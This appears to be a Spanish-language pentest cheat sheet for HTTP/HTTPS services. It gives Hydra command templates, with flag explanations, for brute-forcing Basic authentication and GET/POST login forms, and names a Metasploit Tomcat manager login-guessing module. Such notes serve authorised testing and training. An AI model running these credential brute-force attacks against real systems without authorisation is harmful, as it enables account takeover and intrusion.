# 80/TCP, 443/TCP (HTTP/S)

## Hydra

### Basic HTTP Authentication

```shell
hydra -C <path-wordlist> <target> http-get / -f -V
```

* -C = formato "user:pass".
  * \<path-wordlist> = ruta de wordlist.
* \<target> = objetivo.
* http-get = método HTTP GET.
* -f = salir cuando se encuentra un par de usuario/contraseña correctos.
* -V = modo verboso.

### Método HTTP GET

```shell
hydra -L <path-users> -P <path-passwords> <target> http-get-form "/login.php:username=^USER^&password=^PASS^:<incorrect-reply-message>" -f -V
```

* -L = utilizar archivo de usuarios.
  * \<path-users> = ruta de archivo con listado de usuarios.
* -P = utilizar archivo de contraseñas.
  * \<path-passwords> = ruta de archivo con listado de contraseñas.
* \<target> = objetivo.
* http-get-form = método HTTP GET.
* \<incorrect-reply-message> = mensaje de respuesta incorrecto.
* -f = salir cuando se encuentra un par de usuario/contraseña correctos.
* -V = modo verboso.

### Método HTTP POST

```shell
hydra -L <path-users> -P <path-passwords> <target> http-post-form "/login.php:username=^USER^&password=^PASS^:<incorrect-reply-message>" -f -V
```

* -L = utilizar archivo de usuarios.
  * \<path-users> = ruta de archivo con listado de usuarios.
* -P = utilizar archivo de contraseñas.
  * \<path-passwords> = ruta de archivo con listado de contraseñas.
* \<target> = objetivo.
* http-post-form = método HTTP POST.
* \<incorrect-reply-message> = mensaje de respuesta incorrecto.
* -f = salir cuando se encuentra un par de usuario/contraseña correctos.
* -V = modo verboso.

## Metasploit

### Apache Tomcat

```shell
auxiliary/scanner/http/tomcat_mgr_login
```